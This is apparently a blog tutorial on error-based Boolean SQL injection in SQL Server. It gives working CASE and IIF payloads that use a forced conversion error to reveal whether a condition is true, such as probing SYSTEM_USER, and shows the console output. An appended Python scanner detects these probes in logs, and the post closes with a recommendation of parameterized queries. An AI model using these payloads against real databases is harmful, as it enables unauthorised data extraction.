SQL Server Conditional Statement Injection Tips

Preface

During injection you may run into a situation where an injection point exists but the target table holds no data, so ordinary Boolean-based injection cannot be carried out. The method below gives SQL Server the same effect as the MySQL statement "case when 1 like 1 then 0 else 2*1e308 end": in both cases the false branch yields a value that cannot be converted to the compared data type, and the resulting error makes the Boolean outcome visible.

1> select * from article;
2> go
+----+--------------+----------------+
| id | title        | content        |
+----+--------------+----------------+
| 1  | test title   | Test content   |
| 2  | Test Title 2 | Test content 2 |
+----+--------------+----------------+
(2 rows affected)

# Test table data: users;

sql server> select * from users;
+----+--------------+----------+
| id | username     | password |
+----+--------------+----------+
| 1  | test-user-01 | 123456   |
| 2  | test-user-02 | 234567   |
+----+--------------+----------+
2 rows in set (0.00 sec)

sql server> SELECT system_user;
+--------+
| field1 |
+--------+
| sa     |
+--------+
1 row in set (0.00 sec)

sql server> select db_name();
+--------+
| field1 |
+--------+
| test   |
+--------+
1 row in set (0.00 sec)

CASE Conditional Statement

example 1

SQL: select * from article WHERE id=1 and 1=(CASE WHEN 1=1 THEN 1 ELSE 'x' END);

# the right situation
1> select * from article WHERE id=1 and 1=(CASE WHEN 1=1 THEN 1 ELSE 'x' END);
2> go
+----+------------+--------------+
| id | title      | content      |
+----+------------+--------------+
| 1  | test title | Test content |
+----+------------+--------------+
(1 rows affected)

SQL: select * from article WHERE id=1 and 1=(CASE WHEN 1=2 THEN 1 ELSE 'x' END);

# wrong situation
1> select * from article WHERE id=1 and 1=(CASE WHEN 1=2 THEN 1 ELSE 'x' END);
2> go
22018 - [SQL Server] Failed to convert varchar value 'x' to data type int.

In this way a Boolean result is forced: when the condition is true the row is returned, and when it is false the comparison fails with a conversion error.

CASE Conditional Statement

SQL: select * from article WHERE id=1 and 1=(CASE WHEN system_user like '%sa%' THEN 1 ELSE 'x' END);

# Query if SYSTEM_USER is correct
1> SELECT
    *
FROM
    article
WHERE
    id = 1
    AND 1 = (
        CASE
            WHEN SYSTEM_USER LIKE '%sa%' THEN
                1
            ELSE
                'x'
        END
    );
2> go
+----+------------+--------------+
| id | title      | content      |
+----+------------+--------------+
| 1  | test title | Test content |
+----+------------+--------------+
(1 rows affected)

SQL: select * from article WHERE id=1 and 1=(CASE WHEN system_user like '%aaaaa%' THEN 1 ELSE 'x' END);

# Query the case of SYSTEM_USER error
1> SELECT
    *
FROM
    article
WHERE
    id = 1
    AND 1 = (
        CASE
            WHEN SYSTEM_USER LIKE '%aaaaa%' THEN
                1
            ELSE
                'x'
        END
    );
2> go
22018 - [SQL Server] Failed to convert varchar value 'x' to data type int.

IIF Conditional Statement

SQL: select * from article WHERE id=1 and 1=IIF(1=1,1,'x');

# the right situation
1> select * from article WHERE id=1 and 1=IIF(1=1,1,'x');
2> go
+----+------------+--------------+
| id | title      | content      |
+----+------------+--------------+
| 1  | test title | Test content |
+----+------------+--------------+
(1 rows affected)

SQL: select * from article WHERE id=1 and 1=IIF(1=2,1,'x');

# error case
1> select * from article WHERE id=1 and 1=IIF(1=2,1,'x');
2> go
22018 - [SQL Server] Failed to convert varchar value 'x' to data type int.

IIF Conditional Statement

# Query if SYSTEM_USER is correct
1> select * from article WHERE id=1 and 1=IIF(SYSTEM_USER LIKE '%sa%',1,'x');
2> go
+----+------------+--------------+
| id | title      | content      |
+----+------------+--------------+
| 1  | test title | Test content |
+----+------------+--------------+
(1 rows affected)

# Query the case of SYSTEM_USER error
1> select * from article WHERE id=1 and 1=IIF(SYSTEM_USER LIKE '%aaaa%',1,'x');
2> go
22018 - [SQL Server] Failed to convert varchar value 'x' to data type int.
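From the defender's side, both the CASE and the IIF variants above leave the same two traces: a conditional whose THEN branch is an integer and whose ELSE branch is a string literal, and a SQLSTATE 22018 conversion error when the condition is false. The following Python log scanner is an added example, not part of the original post; the access-log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Signatures of the type-confusion conditionals shown above: a CASE or IIF whose
# true branch is an integer and whose false branch is a string literal.
CASE_RE = re.compile(r"\bCASE\s+WHEN\b.*?\bTHEN\s+\d+\s+ELSE\s+'[^']*'\s+END\b", re.I | re.S)
IIF_RE = re.compile(r"\bIIF\s*\(.*?,\s*\d+\s*,\s*'[^']*'\s*\)", re.I | re.S)
# The server-side symptom: SQLSTATE 22018 / varchar-to-int conversion failure.
CONV_ERR_RE = re.compile(r"22018|convert(?:ing)?\s+(?:the\s+)?varchar\s+value", re.I)
# Assumed (constructed) log format: client_ip "METHOD path?query" status "error text or empty"
LOG_RE = re.compile(r'^(\S+) "(\w+) (\S+)" (\d{3}) "(.*)"$')

def classify_query(raw_query: str) -> set:
    """Return the probe signatures found in a URL-encoded query string."""
    decoded = unquote_plus(raw_query)
    tags = set()
    if CASE_RE.search(decoded):
        tags.add("case_type_confusion")
    if IIF_RE.search(decoded):
        tags.add("iif_type_confusion")
    return tags

def scan_log(lines):
    """Return one finding per request that carries a probe or triggered the error."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not in the assumed format; skip rather than guess
        ip, _method, target, status, error = m.groups()
        _path, _, query = target.partition("?")
        tags = classify_query(query)
        conv_err = bool(CONV_ERR_RE.search(error))
        if tags or conv_err:
            findings.append({"ip": ip, "status": int(status), "tags": tags, "conversion_error": conv_err})
    return findings

def per_client_summary(findings):
    """Count probes and conversion errors per client; both together is the error-oracle pattern."""
    summary = {}
    for f in findings:
        s = summary.setdefault(f["ip"], {"probes": 0, "conversion_errors": 0})
        s["probes"] += bool(f["tags"])
        s["conversion_errors"] += f["conversion_error"]
    return summary

SAMPLE_LOG = [  # constructed sample lines, not captured traffic
    '203.0.113.7 "GET /article?id=1+and+1%3D(CASE+WHEN+system_user+like+%27%25sa%25%27+THEN+1+ELSE+%27x%27+END)" 200 ""',
    '203.0.113.7 "GET /article?id=1+and+1%3DIIF(SYSTEM_USER+LIKE+%27%25aaaa%25%27,1,%27x%27)" 500 "22018 - [SQL Server] Failed to convert varchar value \'x\' to data type int."',
    '198.51.100.2 "GET /article?id=2" 200 ""',
]

if __name__ == "__main__":
    for ip, s in per_client_summary(scan_log(SAMPLE_LOG)).items():
        print(ip, s)
```

A client that alternates between rows and 22018 errors on the same endpoint is reading a Boolean oracle; the durable fix is parameterized queries, so that the injected conditional never reaches the parser.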

Originally published at https://tutorialboy24.blogspot.com
